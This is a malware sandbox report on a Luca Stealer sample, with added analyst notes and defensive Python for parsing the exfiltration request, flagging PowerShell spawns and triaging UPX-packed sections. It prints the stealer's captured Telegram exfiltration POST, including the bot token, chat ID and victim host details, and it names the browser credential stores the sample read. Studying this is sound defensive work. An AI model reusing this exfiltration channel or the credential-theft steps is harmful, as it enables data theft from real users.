Windows Analysis Report
Cracker.exe

Overview

General Information

Sample name: Cracker.exe
Analysis ID: 1551915
MD5: 0f8507a31b1a48f31f26321c9762a513
SHA1: 283e32ff498f529b4d1d8e9d0fecb44b7a219758
SHA256: b0bfae6412f70f426f3cbb56091f5cc157821b591a3391f68ddead55479f93c8
Tags: exe, user-likeastar20

Detection

Luca Stealer
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Luca Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • Cracker.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\Cracker.exe" MD5: 0F8507A31B1A48F31F26321C9762A513)
    • powershell.exe (PID: 7920 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
YARA matches

Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: Cracker.exe PID: 7528 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |

Sigma match

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data:
    Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    CommandLine|base64offset|contains: 
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: "C:\Users\user\Desktop\Cracker.exe"
    ParentImage: C:\Users\user\Desktop\Cracker.exe
    ParentProcessId: 7528
    ParentProcessName: Cracker.exe
    ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
    ProcessId: 7920
    ProcessName: powershell.exe

Suricata alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-08T11:43:33.636300+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49728 | TCP
2024-11-08T11:44:12.186266+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49733 | TCP
2024-11-08T11:44:11.715081+0100 | 2039009 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.8 | 49732 | TCP


      AV Detection

Source: Cracker.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Cracker.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49732 version: TLS 1.2
Source: Cracker.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Adobe\
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Adobe\

      Networking

Source: Network traffic | Suricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.8:49732
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    POST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-4128830475&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-06:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%203CYSMP%20(1280,%201024)%0AHWID:%207263582169614543%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Cracker.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
    content-type: multipart/form-data; boundary=0e61ded359bbe687-2ea147fd7a2bd3f9-546bdba41babde57-da840e621e2da961
    content-length: 936023
    accept: */*
    host: api.telegram.org

The path segment after /bot is the Telegram bot token and chat_id is the destination chat (a negative ID is a group); together they are the exfiltration credentials the sample uses. The caption is the stealer's URL-encoded summary of the run: the geo-IP fields come from the ipwho.is lookup below, followed by a host fingerprint (OS, CPU, GPU, HWID, locale, file location, elevation state, installed AV) and per-category results (Cookies: 2, Files: 30, everything else empty). The 936023-byte multipart body is the collected data itself. Neither this POST nor the ipwho.is GET sends a User-Agent header, which is what the "HTTP GET or POST without a user agent" signature refers to.

Source: global traffic | HTTP traffic detected:
    GET /?output=json HTTP/1.1
    accept: */*
    host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49728
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49733

SID 2022930 is a "Possible" content match on the port-443 stream from 172.202.163.200; the report contains no evidence that the sample carries or receives a CAB-parsing exploit, so treat these two hits as incidental. The network indicators that matter are the api.telegram.org Bot API POST, the ipwho.is lookup, and the SID 2039009 hit on the TLS 1.2 session to 149.154.167.220 on port 49732, the session the Telegram traffic used.

Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported twice)
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Cracker.exe, 00000000.00000003.1978384633.0000029794F44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-412
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svgM
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

The ecosia, duckduckgo, yahoo and google URLs are tagged with the dropped file Web Data.0.dr: they are the search-engine table of the Chromium "Web Data" database the sample copied, i.e. victim browser content, not hosts the sample contacted. The cdn.ipwhois.io flag URL is part of the ipwho.is JSON response.

Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
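The request above is the whole exfiltration channel in one line, so it is worth being able to pull it apart mechanically. The following is an added example, not code from the report or from the stealer: it takes the captured request line (the caption trimmed to a few of its fields, otherwise verbatim), extracts the bot token, API method and chat_id from the URL, and decodes the caption into sections and the per-category counts. The token character class and the "- Section -" / "Key: value" caption grammar are assumptions read off this one capture.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the request line recorded in the report, with the caption
# trimmed to a handful of its fields so the string stays readable. The bot token,
# chat_id and every field value are exactly as they appear in the capture.
REQUEST_LINE = (
    "POST /bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument"
    "?chat_id=-4128830475"
    "&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.90%0ACountry:%20United%20States"
    "%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AIs%20Elevated:%20true"
    "%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202"
    "%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2030"
    "&parse_mode=HTML HTTP/1.1"
)

# Bot tokens are "<bot id>:<secret>". The character class is an assumption that
# fits the token in this capture.
BOT_PATH = re.compile(r"^/bot(?P<token>\d+:[A-Za-z0-9_-]+)/(?P<method>\w+)$")
SECTION = re.compile(r"^- (?P<name>.+) -$")


def parse_caption(caption):
    """Turn the stealer's '- Section -' / 'Key: value' caption into nested dicts."""
    sections, current = {}, None
    for line in caption.splitlines():
        line = line.strip()
        if not line:
            continue
        m = SECTION.match(line)
        if m:
            current = sections.setdefault(m["name"], {})
        elif current is not None and ":" in line:
            key, _, value = line.partition(":")   # first colon only: "Timezone: -06:00"
            current[key.strip()] = value.strip()
    return sections


def parse_telegram_exfil(request_line):
    """Extract token, API method, chat_id and the decoded caption from a
    Bot API request line like the one in the capture."""
    method, target, _version = request_line.split(" ", 2)
    if method != "POST":
        raise ValueError(f"unexpected HTTP method {method}")
    parts = urlsplit(target)
    m = BOT_PATH.match(parts.path)
    if not m:
        raise ValueError("not a Telegram Bot API path")
    query = parse_qs(parts.query)             # percent-decodes as UTF-8, so the check marks survive
    return {
        "token": m["token"],
        "bot_id": m["token"].split(":", 1)[0],
        "api_method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "caption": parse_caption(query.get("caption", [""])[0]),
    }


def stolen_counts(log_info):
    """Map the stealer's check-mark summary to integers: '✅ N' -> N, '✅' -> 1, '❌' -> 0."""
    counts = {}
    for key, value in log_info.items():
        if value.startswith("\u2705"):
            last = value.split()[-1]
            counts[key] = int(last) if last.isdigit() else 1
        elif value.startswith("\u274c"):
            counts[key] = 0
    return counts


if __name__ == "__main__":
    r = parse_telegram_exfil(REQUEST_LINE)
    print("bot id:", r["bot_id"], "chat_id:", r["chat_id"], "method:", r["api_method"])
    for section, fields in r["caption"].items():
        print(f"[{section}]", fields)
    print("stolen:", stolen_counts(r["caption"]["Log Info"]))
```

The bot id (the part before the colon) is stable across token rotations, so it is the better pivot for hunting other samples that report to the same operator; the full token is what you block or revoke.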
Source: classification engine | Classification label: mal92.troj.spyw.evad.winEXE@4/14@2/2
Source: C:\Users\user\Desktop\Cracker.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
Source: C:\Users\user\Desktop\Cracker.exe | File created: C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\
Source: C:\Users\user\Desktop\Cracker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Cracker.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Cracker.exe, 00000000.00000003.1892504724.00000297930ED000.00000004.00000020.00020000.00000000.sdmp, Cracker.exe, 00000000.00000003.1892183886.0000029793107000.00000004.00000020.00020000.00000000.sdmp, Cracker.exe, 00000000.00000003.1894308027.0000029793114000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

key4.db is Firefox's NSS key database and "Login Data" (whose password_notes schema is the string above) is Chromium's password store; both are credential stores the sample read, and the copies it made appear as the Login Data.0.dr and Web Data.0.dr dropped files. The randomly named directory under AppData\Local\Temp is where the collected files are staged before the Telegram upload.

Source: unknown | Process created: C:\Users\user\Desktop\Cracker.exe "C:\Users\user\Desktop\Cracker.exe"
Source: C:\Users\user\Desktop\Cracker.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
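The PowerShell command itself is harmless: Get-Culture's DisplayName is the "Current Language: English (United States)" field of the Telegram caption. What makes this process creation worth alerting on is the combination of a parent running from the user's Desktop and the -NoProfile -NonInteractive -Command flags, which is the kind of relationship the Sigma match at the top of the report keys on. The following is an added example, not a rule from the report or from the Sigma project: a small scorer over process-creation events modelled on this report's process tree. The explorer.exe parent, the extra benign PowerShell launch used for contrast, and the flag weights are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed process-creation events. PIDs 7528/7920/7928 and their images and
# command lines are as recorded in the report; the explorer.exe parent (4212)
# and the last, benign powershell.exe launch (5100) are assumptions for contrast.
EVENTS = [
    ProcEvent(4212, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(7528, 4212, r"C:\Users\user\Desktop\Cracker.exe",
              r'"C:\Users\user\Desktop\Cracker.exe"'),
    ProcEvent(7920, 7528, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command '
              '"[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; '
              'Get-Culture | Select -ExpandProperty DisplayName"'),
    ProcEvent(7928, 7920, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5100, 4212, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '"powershell.exe" -NoProfile -Command "Get-Culture"'),
]

# Directories an unprivileged user can write to. A parent image living in one
# of them is the strongest single signal in this scorer.
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\",
                 "\\appdata\\roaming\\", "\\users\\public\\")

# Weights are this example's own choice, not a published rule.
FLAG_WEIGHTS = {"noprofile": 1, "noninteractive": 1, "nologo": 0,
                "command": 1, "encodedcommand": 2, "windowstyle": 1}

# A "-Flag" token preceded by whitespace; "Get-Culture" inside the script does not match.
FLAG_RE = re.compile(r"(?<!\S)-(\w+)")


def from_user_writable(image):
    p = image.lower()
    return p.startswith("c:\\users\\") and any(d in p for d in USER_WRITABLE)


def score_powershell_spawn(event, parent):
    score, reasons = 0, []
    if parent is not None and from_user_writable(parent.image):
        score += 2
        reasons.append(f"parent {parent.image} runs from a user-writable path")
    for flag in {f.lower() for f in FLAG_RE.findall(event.cmdline)}:
        weight = FLAG_WEIGHTS.get(flag, 0)
        if weight:
            score += weight
            reasons.append(f"-{flag}")
    return score, reasons


def suspicious_powershell_spawns(events, min_score=3):
    """Join each powershell.exe event to its parent by PID and return the ones
    scoring at or above the threshold."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\powershell.exe"):
            continue
        score, reasons = score_powershell_spawn(e, by_pid.get(e.ppid))
        if score >= min_score:
            hits.append({"pid": e.pid, "ppid": e.ppid, "score": score,
                         "reasons": sorted(reasons)})
    return hits


if __name__ == "__main__":
    for hit in suspicious_powershell_spawns(EVENTS):
        print(hit)
```

Run against the constructed events, only PID 7920 (parent Cracker.exe on the Desktop, -NoProfile -NonInteractive -Command) crosses the threshold; the explorer.exe-launched -NoProfile -Command PowerShell scores 2 and stays quiet, which is the behaviour you want on a host where administrators use PowerShell normally.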
Source: C:\Users\user\Desktop\Cracker.exe | Section loaded: apphelp.dll, rstrtmgr.dll, secur32.dll, ncrypt.dll, sspicli.dll, ntasn1.dll, cryptbase.dll, kernel.appcore.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, ntmarta.dll, dpapi.dll, schannel.dll, mskeyprotect.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, gpapi.dll, cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (twice), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll

Of the modules loaded by Cracker.exe, rstrtmgr.dll (Restart Manager, used to get at browser database files that are locked open), dpapi.dll (DPAPI, which the Chromium password store relies on), wbemcomn.dll (the WMI client behind the Win32_Processor and Win32_BaseBoard queries) and schannel.dll with ncryptsslp.dll (the TLS session to api.telegram.org) line up with the behaviour recorded elsewhere in this report.

Source: C:\Users\user\Desktop\Cracker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (CLSID_WbemLocator, the WMI client entry point)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Cracker.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Cracker.exe | Static file information: File size 2269184 > 1048576
Source: Cracker.exe | Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x229600
Source: Cracker.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Cracker.exe | Static PE information: section name: UPX2
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
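The three static findings above (non-standard section names, a UPX1 raw size above 0x100000, the UPX0/UPX1 pair) all come from the section table, which is cheap to read without a full PE library. The following is an added example, not code from the report or from Joe Sandbox: a minimal section-table walk over a constructed image with the same section layout as Cracker.exe, followed by the same three checks. Only the UPX1 raw size 0x229600 and the section names are taken from the report; the virtual sizes and the other raw sizes are made up so the image looks like a UPX-packed file, and the list of "standard" section names is this example's own.

```python
import struct

# Section names a normal MSVC/MinGW-built image uses; anything else deserves a look.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT", ".gfids"}

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress,
                               # SizeOfRawData, PointerToRawData, ..., Characteristics (40 bytes)


def build_minimal_pe(sections):
    """Constructed test image: DOS stub with e_lfanew, PE signature, COFF file
    header with SizeOfOptionalHeader = 0, then one section header per
    (name, virtual_size, raw_size). Only the fields a section-table walk needs
    are filled in; the image is not executable."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 0, 0x22)
    table = b"".join(
        struct.pack(SECTION_HDR, name.encode("ascii").ljust(8, b"\x00"),
                    vsize, 0, rsize, 0, 0, 0, 0, 0, 0)
        for name, vsize, rsize in sections)
    return dos + b"PE\x00\x00" + coff + table


# Layout of Cracker.exe as the report gives it: UPX0/UPX1/UPX2 with a UPX1 raw
# size of 0x229600. Virtual sizes and the other raw sizes are assumptions.
SAMPLE_IMAGE = build_minimal_pe([("UPX0", 0x1000, 0),
                                 ("UPX1", 0x22A000, 0x229600),
                                 ("UPX2", 0x1000, 0x200)])


def pe_sections(data):
    """Walk the section table of a PE image and return name/virtual/raw sizes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # COFF SizeOfOptionalHeader
    base = e_lfanew + 24 + opt_size                               # first IMAGE_SECTION_HEADER
    out = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_HDR, data, base + 40 * i)
        out.append({"name": f[0].rstrip(b"\x00").decode("ascii", "replace"),
                    "virtual_size": f[1], "raw_size": f[3]})
    return out


def triage_sections(sections, raw_limit=0x100000):
    """The three checks the report applies, plus the unpack-destination heuristic."""
    findings = []
    names = {s["name"] for s in sections}
    for s in sections:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']}")
        if s["raw_size"] > raw_limit:
            findings.append(f"raw size of {s['name']} is bigger than 0x{raw_limit:X}: 0x{s['raw_size']:X}")
        if s["virtual_size"] and s["raw_size"] == 0:
            findings.append(f"{s['name']} has virtual size but no raw data (unpack destination)")
    if {"UPX0", "UPX1"} <= names:
        findings.append("UPX section layout (UPX0/UPX1): UPX-packed")
    return findings


if __name__ == "__main__":
    for line in triage_sections(pe_sections(SAMPLE_IMAGE)):
        print(line)
```

The practical consequence of the UPX layout is that static string and import checks on Cracker.exe say little; the Telegram URL and browser paths only show up in process memory, which is why the report's string hits are all against .sdmp memory dumps. Unpacking first (the standard UPX layout usually unpacks with the stock tool, unless the headers were modified) is the precondition for any static work on this sample.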
Source: C:\Users\user\Desktop\Cracker.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (reported 70 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3445
Source: C:\Users\user\Desktop\Cracker.exe TID: 7532 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 | Thread sleep count: 2680 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 | Thread sleep count: 3445 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8028 | Thread sleep time: -922337203685477s >= -30000s

The only delay attributable to Cracker.exe itself is the single 35000 ms sleep on TID 7532. The 922337203685477 values are Int64.MaxValue in 100-ns ticks converted to milliseconds, i.e. an infinite wait, and sit on powershell.exe's own threads (TIDs 8008 to 8040) together with the 2680 and 3445 sleep loops; the "Contains long sleeps (>= 3 min)" and "high number of Window / User specific system calls" signatures can only be satisfied by those PowerShell-side values, not by the sample's 35 s pause.

Source: C:\Users\user\Desktop\Cracker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\Desktop\Cracker.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\Cracker.exe | Thread delayed: delay time: 35000
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Cracker.exe, 00000000.00000003.1892790947.000002979310D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690

These "VMware" strings are site names with a value and a timestamp appended, and they sit at 0x2979310D000, inside the same heap range (0x297930ED000 to 0x29793114000) that holds the Login Data schema string above: they are harvested browser login entries, not strings from the sample's own code. The VM-fingerprinting evidence in this report is the pair of WMI queries (Win32_BaseBoard SerialNumber, Win32_Processor Name), which also feed the HWID and CPU fields of the Telegram caption.
